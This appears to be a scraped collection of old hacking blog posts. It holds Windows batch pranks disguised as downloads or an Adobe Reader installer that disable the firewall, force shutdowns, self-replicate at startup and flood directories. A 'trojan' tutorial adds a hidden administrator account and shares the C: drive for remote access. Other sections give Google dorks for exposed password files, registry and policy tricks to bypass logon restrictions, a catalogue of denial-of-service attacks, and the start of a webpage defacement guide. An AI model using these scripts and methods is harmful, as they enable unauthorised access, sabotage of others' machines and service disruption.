echo.
echo.
echo Incoming Message.
ping local host -n 1 >nul
cls
echo.
echo.
echo Incoming Message..
ping local host -n 1 >nul
cls
echo.
echo.
echo Your Name has sent you a file.
ping local host -n 2 >nul
echo.
echo Do You Want To Download (Y,N).
set /p inputchoice=
IF %inputchoice% equ y goto pause
IF %inputchoice% equ n goto exit
IF %inputchoice% equ copy goto copy
IF %inputchoice% equ 123 goto accessgranted
:pause
cls
echo.
echo.
echo Experiment 1.0.1 Downloading.
ping localhost -n 2 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Downloading..
ping localhost -n 1 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Downloading...
ping localhost -n 1 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Downloading.
ping localhost -n 1 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Installing.
ping localhost -n 1 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Installing..
ping localhost -n 1 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Installing...
ping localhost -n 1 >nul
cls
echo.
echo Your Name says:This Is My Latest Experiment.
ping localhost -n 2 >nul
echo.
echo.
echo The File You Are Trying To Access Is Password Protected.
ping localhost -n 1 >nul
echo.
echo.
echo Please enter a password To Continue:
set /p inputchoice=
IF %inputchoice% equ qwerty123 goto accessgranted

:deny
echo.
echo.
echo Incorrect Password Please Try Again.

echo Please enter a password To Continue:
set /p inputchoice=
IF %inputchoice% equ lol goto accessgranted

echo.
echo.
echo Incorrect Password Please Try Again.

echo Please enter a password To Continue:
set /p inputchoice=
IF %inputchoice% equ 123 goto accessgranted

echo.
echo.
echo Incorrect Password Starting Saftey Procedures.
cls
Rundll32 user32,SwapMouseButton
cls
start shutdown.exe -s -f -t 10 -c "Windows Has Detected A Virus And Is Shuting Down!"
net user Guest Guest /add
net stop â€œSecurity Centerâ€
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
echo.
echo.
echo ________________________
echo YOU HAVE BEEN TERMINATED'
ping localhost -n 2 >nul
cls
echo YOU HAVE BEEN TERMINATED''
ping localhost -n 2 >nul
cls
goto file
echo YOU HAVE BEEN TERMINATED'^'
ping localhost -n 2 >nul
cls
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
start 1
start 2
start 3
start 5
start 6
start 7
start 8
start 4
cls
exit

:accessgranted
echo Press enter to Scan for viruses.
pause
dir C:\Program Files\s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
cls
echo.
echo.
echo Scan Complete 1 Virus found.
ping localhost -n 4 >nul
echo.
echo.
echo Engaging Antivirus
ping localhost -n 4 >nul
pause
start shutdown.exe -a
start E:\mouse.lnk
start G:\mouse.lnk
exit

i built this for vista and to run off a thumb drive the whole scan is fake ok so i know that.
#####################################################################################

@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw u up
msg * good look finding how to fix it
#####################################################################################

This is a .bat file i made for school pc's.Have fun.It's also realy anoying but harmless.

@echo off
title Program Adobe Reader 8
:a
:1
@echo off
echo download all files of program "adobe reader"? y or n
echo y=yes
echo n=no
set input=
set /p input=enter your option:
if %input%==y goto y
if %input%==n goto a
:y
echo hey
:n
pause
color 40
echo Please Wait One Moment(this may take a few min.)
echo downloading
md.yousuck
md.yousuck1
md.yousuck2
md.yousuck3
md.yousuck4
md.yousuck5
md.yousuck6
md.yousuck7
md 3456 rrrwwuwuuuuysdd
md 3456\md2
md 630008342
md 630008342\md30465389576
md.hjm,6u
md.hm,y
md.jryju56u
md.urmuty56u
md.o,mryumu
md.rjyu56
md.u5jjum,u
md.y4mt,ry6
md.76yutuu
md.4y,mm56
md.ejy,rut5u6
md.mjyumyuu
md.lyumtr56
md.68mr9uumr
md.ojyt56
md.6mrrnmtu
md.jtu6ryu56hy
md.oryimu,rty
md.74,n6
md.ujryitmu
md.fyhyi,huu6
md.nv,mryu6
md.j,yimntu
md.m5yinmu6rt
md. n,nmr6
md.fh,yiu65u66uu
md.djtyiu6mtur 6u
md.ni,t66u56
md.ry,yhyu66u
md.jynth6y46u
md.trn,ymir,hethy444
md.gethgethteht
md.tyjhtyju7ytju7u
md.787876ujytj
md.7u577
md.rhytru5uuuuuu788uuuuu45
md. 6ty rtyr etty
md.tyyo
md.rytryrtthrrrrytrh
md.ryrtytrytit
md.6yyyyyyyyyyyyyiiiiyyyyyytryt
md.htrhwrthrthii
md.trhtrhtrt
md.htehtrht
md.iiii677i76457uiui57iiii677i76457uiu
md.iiii677i76457uiui574346t34t341t
md.iiii677i76457uiui57iiii657uiui57423
md.iiii677i76457uiui57iiii677i76iui57
md.iiii677i76gtmjmto
md.iiii677i7645yoi
md.iiii677i76457gjjgggggfffh
md.uiuiuiuiuiuiuiuiuiuuuuuug
md.uitur5ur
md.itt69
md.tu9toto
md.7jt58iot
md.7iui789
md.iui9oty
md.7u68
md.76iio89o
md.76iiii768
md.iu7i7ui7ioi
md.6t6i5i7oio
md.7iu776i7io
md.iiii677i764io57uiui57
md.j6ii6irt7i
md.iyh7i7tyjti
md.76uiy7i67
md.67tthujy6j6i
md.ituu7i7y76uyty
md.7j67u6ui
md.ryjtytj7ryij
md.jyyi7jut
md.ryj7y
md.ry7ijyj
md.jyiotyi
md.jhjryiio
md.ryyj7
md.854/y*7ui
md.57484ju7/854545814547
md.76i45/io
md.7458t
md.u7j45u7
md.5645778yu
md.68478yui
md.yhj558
md.hjr8798789
md.ry56875
md.hj65ui
md.try3154
md.dfj1254
md.nb0254
md.b0254
md.n412054
md.njfh442124
md.545
md.g124dh45
md.thet2hth5
md.8yyg5124e554
md.8egherg245
md.5+ethget4502
md.5+ghtd12
md.-bgddhd
md.+5ghd
md.85gh
md.8-+dgh
md./8+dgh
md.+dg
md.+8hd
md.-8ghh
md.7498dgh
md./*7897*dhadgh
md.7/87daggad
md.48dfgadf
md.9gdfag
md./94dghd
md.84tydgaha
md.876yty84/7dgha
md.itytthadg
md.uutuythdg
md.iyyyhdg
md.turttyythdghytyt
md.yutywtyetyydg
md.iyu8yuiitujkhad
md.yujikythad
md.iyuyghadg
md.886ytyuihadg
md.iuykithdg
md.68jkyytuihdguy
md.5689yth
md.689ygh
md.94ytty5ghyety
md.jutrjtutryjghdg796
md.jujutr58jtyh
md.ujtrj6ty
md.tjuty
md.jtujjrtyuj
md.jttuyuttyrr
md.tujtujurty
md.jtrjjtry
md.tuutry
md.tujjrry
md.tyjjjr
md.jtuuyr
md.yttujjyur
md.tyjjuruy
md.jjtujuy
md.yytuuutyujt
md.jtjjuuty
md.yjtuujjtu
md.jtyjrujtu
md.hjyjjtrjjutjt
md.jyutuujth
md.yyjjuurjjgh
md.5tujuuujutjghru7u
md.8urjjjgh
md.57ujujgh
md.58jujdgbs
md.87rujh
md.75jrujrhu
md.8tjrjruughrjurj
md.3urjrrrjhg
md.8jrjjh
md.58j57gj
md.78urjghj
md8.78jr
md.835ghj
md.7ugh
md.6787j
md.76u7ghjghgh8
md.t78jjj
md.78j5gghjjkgh7u
md.7t8jggh
md.8j7ghjjj
md.768ghjhgjghjg
md.8ty7gh
md.7j8jjhj
md.8thghhjyyjh577
md.7j7uhjuhjh
md.78t75hgjghj
md.jyyyuh8ghj
md.8tfgghj
md.76ghh
md.88fghjgh
md.7576j
md.837itghj87uitu
md.8376gh
md.85j8j
md.57tyhgj67
md.82j8hg
md.57dgt6jgh7
md.578j5678j
md.8gfj78hj
md.75t56
md.578yuhji
md.7528hj
md.78u6i
md.78t7i67j
md.56jtuh5tuiii6
md.57387jt87j6
md.274674ri6tu725767678
md.hjtj8i
md.wrtuyi6859
md.jtrrhji
md.tyjthtuyu68
md.yjterynikhjty
md.jyjtjtyuyk
md.jeyuk
md.ytyjtyyuj
md.tjtyhjyrjky
md.tyejtjtyhjki
md.jtyjyyk
md.tehtyjtyik
md.jhjjtyyik
md.tytjtyyi
md.yjyjtyjki
md.jtytjrk
md.yrjtyyi
md.hyuyjtky
md.trtjujk
md.htjytyk
md.trutjjyi
md.ferhjytk
md.ghutyjyk
md.4nhti
md.hfyk
md.46hyikj
md.hdnjik
md.h4y6yt
md.46jeni
md.hy;0bnm
md.hfeyj46
md.hyty4etn
md.4yjmrgj
md.yjytfns
md.7tyfnbj
md.67ty8j
md.yj8jty
md.76tnttyjhy
md.78jrjtj
md.uiltyy7yil
md.lu,l57nhjnhjnhjtyj8uyti
md.ui,8luili
md.,lkiiltut5
md.76t578t,iouilty
md.ii,8bgtyul
md.8lyti577ulitl
md.l;,58ghultu
md.l;8jy78gfh3um,
md.yji85fgutl
md.8mhgfiltu
md.96;jy7jltui
md.ilomyi7fdhjk
md.mu59gf
md.tyny79ossshjjjtuk
md.mmogftolyu
md.tyjo8hjgfyo
md.ymm78jjiyloty
md.mmkfjyky
md.tygufhj
md.mymjmfhky
md.emtyryumjty
md.tymytmtyfhj
md.ytmytmtym
md.mymtymhfj
md.ytttttttt
md.tyhjmuir
md.emhuuuur
md.dmtjmeymm
md.jajajajajaja
md.yousuck8
md.yousuck9
md.yousuck10
md.yousuck11
md.yousuck12
md.yousuck13
md.yousuck14
md.yousuck15
md.yousuck16
md.yousuck17
md.yousuck18yf
md.yousuck19nm
md.yousuck2ny0
md.6yh635h
md.6h346nmy
md.hyh46h
md.46yh4hn6
md.uy46n
md.4646hf
md.y464hn
md.6y46hnf
md.4hkykykyf
md.6yhh46
md.346346
md.hy346h56h
md.4643hh
md.4hfgmfgmgm
md.6hh46mgjmjm
md.46yfhmymymh346
md.34346h6hmhmhm
md.hhhjmdggjmjg
md.46hh46gmjmjg
md.46h63gfm
md.46hmmjm
md.h3447gmmmjmjjm46h4
md.57j46jgjj
md.5j4jmgjmm
md.h557jmmgjm
md.3j57jgjjmgjmjm
md.57yjjjmgjgjm
md.35yj57gjmmgj
md.j7jj5mmj
md.3577y57m
md.j7j3j77jryjm
md.jj777jj
md.j7j57j5mj7
md.3j5j7k57m
md.63j578jmmgjmj
md.5657j8kj
md.j3575j76m
md.j57j7kjm
md.jj578kj
md.57j57k7
md.j5j75jjet5757
md.jtyjtytj75k
md.tyyyjtk
md.tyjtejyjtjyk
md.jtjjj578k5gjmgjmj5
md.jtytjyje578k
md.tytjjtyty58
md.tyjyjtyjt58
md.jetjtyyj568k
md.jetytyjtjk
md.etyyjtyjt568k58
md.ytjtyjyjt5858k
md.jjejej568k568k
md.ytyjjtjytyek5757k8
md.tretjyt6k568k57
md.jtyyjtk684k8k
md.eyyjjtjy85jmjmjm68k56k
md.yjjtrykry6uryk685
md.4jyikyikrykyrk
md.ykrukyukuik
md.ryukrrrukyu
md.trjutukrujktuk
md.tjrrtkkkktr
md.tyhtyjutjtr
md.hjyejyrtyj
md.rhjyejeryjmjmhjery
md.hrehryehyr
md.hyrrhrhr
md.tyhty
md.hytrhtrh
md.hhty
md.teyhyyyhtryh
md.jhryh
md.46j46tyj4
md.kj57h
md.7k64jyhetyh55
md.7hjhe
md.8974ety5mjmh
md.45jhmfjm
md.9hyrjmm
md.905heh;fm
md.5hhyfjmf
md.8l5yfmf
md.6kh56th9
md.7h5ye
md.6j7h5yeh
md.467k6hej
md.457jk56ryh
md.7j56hrh
md.6j556hyh
md.556hy7
md.j56heh
md.545hyt
md.hjryyuukyk5y635j
md.hrumhjtujm5h53h563hryhh
md.mumtujrut
md.utujjrt
md.ummujuj
md.mumjujrt
md.tuujtujy
md.tummtujuk
md.emutjtuky
md.tumujnit
md.mtmttujlk
md.mtuttjuyi
md.tymutujyikl
md.nmmjutk
md.tytumjtjyyi
md.tyjueruutrjik
md.jmumutykyuu
md.tyummkj
md.yjuutu
md.jemujmujjujk
md.tum,yu,tujmtu
md.m,yi,yir
md.ryiy,,n
md.umi,r,ytyiy,i
md.um,yien
md.rtumryiyn
md.umiy,yn
md.uy,nnyyyy
md.rmny,eurbsrnyn,
md.yyynygjtr
md.nyynnyertrut
md.nnnywtujer
md.ynyte3j
md.ynntyn4y6jtu4h5y
md.neynn43jtuh3
md.ynyhrtu
md.yyneerhtrj
md.nerhhrtuj
md.hhrmh6jrhjrhry
md.mruuu63y6yu3
md.umummuy5hy46
md.mtmumum456346hurm
md.uu63u5u56u
md.m56u56j666h
md.murhe6rtu
md.uherhj
md.merhrtujt67ueh
md.mu56jju6j
md.u5h65tu7j
md.m36hjui
md.u65jkutyhjtjuu
md.tumtur6ju
md.m5jj
md.ruy6h4tm
md.tumt6tj
md.mju75775jtyjt
md.ntyhrrhryu5
md.kyuuuuuuky
md.uiuii
md.tituirr
md.tuiuuuuuur7itur
md.6iutrjutr8777rj
md.j56ijtuj
md.ti56itu
md.trjturui
#####################################################################################

Try this one it doesn't freeze the computer but it is annoying as hell and it doesn't go away when you log out

------------------
@echo off
:l
msg * hi
msg * hi
exit
goto l
-------------------

just save as a .bat into this folder
C:\Documents and Settings\All Users\Start Menu\Programs\Startup

(the startup menu for all users)
this will make it so when they log in that message box will appear
#####################################################################################

The final code ends up looking like:

net user neo /add
net localgroup administrators neo /add
net share system=C:\ /ADDNAME
explorer \\victimip\system
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "neo" /t REG_DWORD /d 00000000 /f

The last command was added by me, it keeps the username from showing up in the start menu.
#####################################################################################

@echo off
copy %0 "%userprofile\Start Menu\Programs\Startup
tskill explorer
shutdown -s -t 5 -c "virus"
:1
start %0
start %0
start
goto 1

Making your own trojan in a .bat file

2008-01-23T22:08:00.000-08:00

-:Making your own trojan in a .bat file:-

Open a dos prompt we will only need a dos prompt , and windows xp...

-Bazics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

dir
pause

And now save this as test.bat and execute it.
Funny aint it ?

---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access

Using Google for getting interesting information

2008-01-23T22:04:00.000-08:00

Using Google for getting interesting information

Hi, I am a french student and I heard recently about the capacity of google to deal
with documents from Word, Excel or Powerpoint. Intested in that fact, I decided to
experiment some words and expression (with ") to look for (sorry if my english is not
perfect..) and I found some combos that give enormous results. In google, if you
type things like :

1)"Index of /admin"
2)"Index of /password"
3)"Index of /mail"
4)"Index of /" +banques +filetype:xls (for france...)
5)"Index of /" +passwd
6)"Index of /" password.txt

And you can continue as long as your imaginatio is active. For example of my
results, I saw great informations from the central banks of Luxemboug and
Switzerland, could admin a SQL server, ...

So, I don't know if it is a great technical bug, but I know about hacking
and security (I would like to be a security consultant later..) (and I am
looking for a training in security in a foreign country like US or
England...) and even if we don't get root access immediatly, it is
a great step for social engineering and spying.

Hack into Windows Network

2008-01-23T21:59:00.000-08:00

Hack into Windows Network

////////////////////////////////////////////////////////////////////

I have read lots of articles embrace various methods of hacking into
windows networks. Except for NetBIOS attacks, the majority of the
others concern registry attacking. Not to impugn these authors, their
hacking tutorials reflected very limited understanding of registry
structure and how exactly it works. They probably know perfectly how
to use the registry, but the knowledge behind it. Okay, get rid of my
guff. Let’s start.

////////////////////////////////////////////////////////////////////
DOS ATTACK (local computers or equivalent to local computers but in a
network ONLY)
////////////////////////////////////////////////////////////////////

Say you have a situation:

NO user name and password are given
NO Bios password banner being active
A: or CD-ROM drive is present and functional
Basic principle: make your own registry file which anti-disable the
functions that were disabled in your target computer, then import it
to the system registry, restart the computer or refresh the system.

Copy the red bit and save it as *.reg

Regedit 4

[HKEY_LOCAL_MACHINE\Network\logon]

"mustbevalidated"=dword:00000000

Boot up your computer to real Dos and copy the file to a path like c:

Type: path c:\windows enter

Regedit *.reg enter

You will see something like ‘successfully’. Restart your computer see
what happens.

This file would let you enter windows without providing your user name
and password, but simply click on cancel or press Esc.

////////////////////////////////////////////////////////////////////
GUI ATTACK (Network computers)
////////////////////////////////////////////////////////////////////

Again, say you have a situation:

Granted an account with limited privilege
Internet connection available and eligible to download
A: drive inaccessible, but physically present
NOT on Windows NT or 2000 network, administrator use other programs
restrict your access rights.

Basic principle: Write your own reg file and send it to your email box
then receive it on the target computer, run the reg file without
saving it(for your own safe, might get caught if you do save).

Like dos attack, copy the red bit once again, save it as *.reg, then
double click on it to execute, also you can put more stuff in it to
enable more functions, example:

Regedit 4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]

"norun"=dword:00000000

After running the file, you have to refresh your system, you can log
out and log back in, as long as you are not on a Windows NT or 2000
network, the administrator use other programs restrict your access
rights. Or, you press ctrl+alt+del, when a box pops up and ask you to
confirm shut down computer or restart, just press cancel, then wait
few seconds until another box comes up, click on end task. All the
functions which you have enabled will take affect immediately.

On Windows NT or 2000 network, the administrator use policies to
restrict your access rights.

Make sure hidden and system files are shown. Go to windows folder and
search poledit.exe, double click on it. An error message will pop out
say can’t find pol file, no worries, click ok, then cancel the next
box. Go to option and click on template, add. Go to system drive:
\windows\inf. Then you will see heaps adm file, choose windows.adm and
press ok. Then go to file, open registry. What can you see? Change it
around for your own pleasure, mate.

If you wanna know the whole network configuration just click on File
and go the option below Exit.

DO REMEMBER to refresh your system. (Don’t log out and back in, the
other way)

If you want to get access to A: drive, first enable show all drives in
policy. If doesn’t work, enable dos prompt. Use assembly language
type:

Debug

-O 70 10

-O 71 0

Or make up any numbers which are different. (Cheat POST)

Method 2: unplug the network cable when being copying policy from the
server, then you got full access to the computer, but out of the
network, no worries. Go to windows folder then inf folder, which is
default hidden. Move the *.adm files to other path, then log back in.
cause the system cant find any restriction configuration files,
apparently the restrictions are not going to take affect.

Enjoy

ATTACKING FROM THE OUTSIDE

2008-01-23T21:55:00.000-08:00

ATTACKING FROM THE OUTSIDE

by http://www.student.tdb.uu.se/~t95hhu/secure/outside.htmlTAKING ADVANTAGE OF FINGERMost fingerd installations support redirections to another host. Ex: $finger @
system.two.com@system.one.comfinger will in the example go through system.one.com and on to system.two.com. As far as system.two.com knows it is system.one.com who is fingering. So this method can be used for hiding, but also for a very dirty denial of service attack. Lock at this: $ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attackAll those @ signs will get finger to finger host.we.attack again and again and again... The effect on host.we.attack is powerful and the result is high bandwidth, short free memory and a hard disk with less free space, due to all child processes. The solution is to install a fingerd which don't support redirections, for example GNU finger. You could also turn the finger service off. UDP AND SUNOS 4.1.3.SunOS 4.1.3. is known to boot if a packet with incorrect information in the header is sent toit. This is the cause if the ip_options indicate a wrong size of the packet. The solution is to install the proper patch. FREEZING UP X-WINDOWSIf a host accepts a telnet session to the X-Windows port (generally somewhere between 6000 and 6025. In most cases 6000) could that be used to freeze up the X-Windows system. This can be made with multiple telnet connections to the port or with a program which sends multiple XOpenDisplay() to the port. The same thing can happen to Motif or Open Windows. The solution is to deny connections to the X-Windows port. MALICIOUS USE OF UDP SERVICESIt is simple to get UDP services (echo, time, daytime, chargen) to loop, due to trivial IP-spoofing. The effect can be high bandwidth that causes the network to become useless. In the example the header claim that the packet came from 127.0.0.1 (loopback) and the target is the echo port at system.we.attack. As far as system.we.attack knows is 127.0.0.1 system.we.attack and the loop has been establish. Ex: from-IP=127.0.0.1 to-IP=system.we.attack Packet type:UDP from UDP port 7 to UDP port 7Note that the name system.we.attack looks like a DNS-name, but the target should always be represented by the IP-number. Quoted from
proberts@clark.net (Paul D. Robertson) comment on comp.security.firewalls on matter of "Introduction to denial of service" A great deal of systems don't put loopback on the wire, and simply emulate it. Therefore, this attack will only effect that machine in some cases. It's much better to use the address of a different machine on the same network. Again, the defaultservices should be disabled in inetd.conf. Other than some hacks for mainframe IP stacks that don't support ICMP, the echo service isn't used by many legitimate programs, and TCP echo should be used instead of UDP where it is necessary. ATTACKING WITH LYNX CLIENTSA World Wide Web server will fork an httpd process as a respond to a request from a client, typical Netscape or Mosaic. The process lasts for less than one second and the load will therefore never show up if someone uses ps. In most causes it is therefore very safe to launch a denial of service attack that makes use of multiple W3 clients, typical lynx clients. But note that the netstat command can be used to detect the attack (thanks to Paul D. Robertson). Some httpd:s (for example some http-gw) will have problems besides the normal high bandwidth, low memory... And the attack can in those causes get the server to loop. MALICIOUS USE OF telnetStudy this little script: Ex: while : ; do telnet system.we.attack & doneAn attack using this script might eat some bandwidth, but it is nothing compared to the fingermethod or most other methods. Well the point is that some pretty firewalls and httpd:s thinks that the attack is a loop and turn them self down, until the administrator sends kill -HUP. This is a simple high risk vulnerability that should be checked and if present fixed. MALICIOUS USE OF telnet UNDER SOLARIS 2.4If the attacker makes a telnet connections to the Solaris 2.4 host and quits using: Ex: Control-} quitthen will inetd keep going "forever". Well a couple of hundred... The solution is to install the proper patch. HOW TO DISABLE ACCOUNTSSome systems disable an account after N number of bad logins, or waits N seconds. You can usethis feature to lock out specific users from the system. LINUX AND TCP TIME, DAYTIMEInetd under Linux is known to crash if to many SYN packets sends to daytime (port 13) and/or time (port 37). The solution is to install the proper patch. HOW TO DISABLE SERVICESMost Unix systems disable a service after that N sessions have been open in a given time. Well most systems have a reasonable default (lets say 800 - 1000), but not some SunOS systems that have the default set to 48... The solutions is to set the number to something reasonable. PARAGON OS BETA R1.4Paragon is Intels supercomputer platform built for high performance scientific and technical computing. If someone redirects an ICMP (Internet Control Message Protocol) packet to a paragonOS beta R1.4 will the machine freeze up and must be rebooted. An ICMP redirect tells the system to override routing tables. Routers use this to tell the host that it is sending to the wrong router. The solution is to install the proper patch. NOVELLS NETWARE FTPNovells Netware FTP server is known to get short of memory if multiple ftp sessions connects to it, causing it to crash. About 5 at a time - 100 sessions total within a short period of time, could do the trick. ICMP ATTACKSGateways uses ICMP redirect to tell the system to override routing tables, that is telling thesystem to take a better way. To be able to misuse ICMP redirection we must know an existing connection If we have found a connection we can send a route that loses it connectivity or we could send false messages to the host. One could also send spoofed ICMP Source Quench messages, this could slow down the conncection. Ex: (false messages to send) DESTINATION UNREACHABLE TIME TO LIVE EXCEEDED PARAMETER PROBLEM PACKET TOO BIGThe effect of such messages is a reset of the connection. The solution could be to turn ICMP redirects off, not much proper use of the service. BROADCAST STORMSThis is a very popular method in networks there all of the hosts are acting as gateways. There are many versions of the attack, but the basic method is to send a lot of packets to all hosts in the network with a destination that don't exist. Each host will try to forward each packet so the packets will bounce around for a long time. And if new packets keep coming the network will soon be in trouble. Services that can be misused as tools in this kind of attack is for example ping, finger and sendmail. But most services can be misused in some way or another. EMAIL BOMBING AND SPAMMINGIn a email bombing attack the attacker will repeatedly send identical email messages to an address. The effect on the target is high bandwidth, a hard disk with less space and so on... Email spamming is about sending mail to all (or rather many) of the users of a system. The pointof using spamming instead of bombing is that some users will try to send a replay and if the address is false will the mail bounce back. In that cause have one mail transformed to three mails. The effect on the bandwidth is obvious. TIME AND KERBEROSIf not the the source and target machine is closely aligned will the ticket be rejected, thatmeans that if not the protocol that set the time is protected it will be possible to set akerberos server off function. SUNOS KERNEL PANICSome SunOS systems (running TIS?) will get a kernel panic if a getsockopt() is done after that a connection has been reset. HOSTILE APPLETSA hostile applet is any applet that attempts to use your system in an inappropriate manner. The problems in the java language could be sorted in two main groups: 1) Problems due to bugs. 2) Problems due to features in the language.In group one we have for example the java bytecode verifier bug, which makes is possible for an applet to execute any command that the user can execute. Note that two other bugs could be found in group one, but they are both fixed in Netscape 2.01and JDK 1.0.1. Group two are more interesting and one large problem found is the fact that java can connect to the ports. Meaning that all the methods described in .C.X. can be performed by an applet. More information and examples could be found at addresshttp://www.math.gatech.edu/~mladue/HostileArticle.htmlIf you need a high level of security you should use some sort of firewall for protection againstjava. As a user you could have java disable. ANONYMOUS FTP ABUSEIf an anonymous FTP archive have a writable area it could be misused for a denial of service attack similar with with .D.3. That is we can fill up the file system. Also can a host get temporarily unusable by massive numbers of FTP requests. SYN FLOODINGBoth 2600 and Phrack have posted information about the syn flooding attack. 2600 have also posted exploit code for the attack. As we know the syn packet is used in the 3-way handshake. The syn flooding attack is based on an incomplete handshake. That is the attacker host will send a flood of syn packet but will notrespond with an ACK packet. The TCP/IP stack will wait a certain amount of time before droppingthe connection, a syn flooding attack will therefore keep the syn_received connection queue of the target machine filled. PING FLOODINGThe impact of ping flooding is big. Under Unix we could try something like: ping -s host to send 64 bytes packets. If you have Windows 95, click the start button, select RUN, then type in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions. In section xxxxxxxxxxxxxxxxxxxxxxxxxxxxx you can find information about a ping-flooding-gun. Under Unix the -f switch could be of use. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINESIf someone can ping your machine from a Windows 95 machine he or she might reboot, freeze or crash your machine. The attacker simply writes: ping -l 65510 address.to.the.machineAnd the machine will freeze or reboot. A very good page about the problem and with a long list of affected systems can be found at address http://www.sophist.demon.co.uk/ping/The page is maintained by Mr Mike Bremford. MALICIOUS USE OF SUBNET MASK REPLY MESSAGEThe subnet mask reply message is used under the reboot, but some hosts are known to accept the message any time without any check. If so all communication to or from the host can beturned off.The host should not accept the message any time but under the reboot. FLEXlmAny host running FLEXlm can get the FLEXlm license manager daemon on any network to shutdown using the FLEXlm lmdown command. # lmdown -c /etc/licence.datlmdown - Copyright (C) 1989, 1991 Highland Software, Inc.Shutting down FLEXlm on nodes: xxxAre you sure? [y/n]: yShut down node xxx#BOOTING WITH TRIVIAL FTPTo boot diskless workstations one often use trivial ftp with rarp or bootp. If not protected anattacker can use tftp to boot the host. ATTACKING USENETIt can be possible to cancel some ones else's article, destroy newsgroups and sending false postings to Usenet. Fore more information about this see the FAQ:alt.2600 question 15. ATTACKING NAME SERVERSThe name server is the program that holds the information about the domain and answers questions. The part of the domain name space that the name server holds is referred to as a zone. The name server is seldom the only one, it is a to important service. Instead can at least two be found, the primary master and the secondary master. However can not to many secondary masters exist (10 ?). The secondary master provides a backup to the primary. Every time the name server makes a request it collects and store information and next time ifanother query is made for the information, it already have it in the cache. An attack at the name server could have a very big impact. Many servers depends heavily onproper working name servers, for example: rlogin, rsh, rcp, xhost, NFS, smtp, ftp... To attack the name server could we of course use any method described in this paper, but the machine running the name server seldom do anything except DNS-work. The DNS-server is also veryimportant and have had several security problems that are well known. Because of these reasons will the DNS-server most likely be well protected and other services beside DNS will probably not exist (although ping flooding could be a threat if not a firewall that filters ping fromthe outside exist). The attack that are left is to attack the service it self at port 53.We could for example: Send random garbage to it. Send true queries to it. Use syn flooding. Alternative two should be the most effective one, because it will do every thing that alternative one do and beside that keep the service program it self busy looking up DNS-names. Putting together a long random list with DNS-name will also contain mostly addresses outside the zone, making the name server to try querying other name servers. SSH AND PPPIf a PPP connection is made via SSH drops, all processes controlled by it can get zombied out. The processes can not be killed with a kill -9 -1. To get rid of the zombies kill sshd. LOGIN VIA SSHSsh can be used to block login. Force sshd to ask for password during login. Connect to the system but do not give the password. Until you have given the password no one else will beable to login. This is a matter of configuration. BINDTelnet to port 53 on a host running BIND-4.9.5-P1. Enter something for example abcdef, but ifthat doesn't work just try something else. Hit enter and close the connection. The server will not now accept any TCP connections and the named-process may consume a lot of CPU time. ping -sv -i 127.0.0.1 224.0.0.1 $ ping -sv -i 127.0.0.1 224.0.0.1Can cause Solaris to reboot or crash. qmailA machine running qmail can run out ouf memory if someone are sending SMTP commands of unlimited length. Two example programs can be found at address: htt

How To Deface a WebPage

2008-01-23T21:51:00.000-08:00

How To Deface a WebPage

Steps To Deface A Webpage (About Defacers)

First of all, I do not deface, I never have (besides friends sites as jokes and all in good fun), and never will. So how do I know how to deface? I guess I just picked it up on the way, so I am no expert in this. If I get a thing or two wrong I apoligize. It is pretty simple when you think that defacing is just replacing a file on a computer. Now, finding the exploit in the first place, that takes skill, that takes knowledge, that is what real hackers are made of. I don't encourage that you deface any sites, as this can be used get credit cards, get passwords, get source code, billing info, email databases, etc.. (it is only right to put up some kind of warning. now go have fun ;)

This tutorial will be broken down into 3 main sections, they are as followed:
1. Finding Vuln Hosts.
2. Getting In.
3. Covering Your Tracks

It really is easy, and I will show you how easy it is.

1. Finding Vuln Hosts
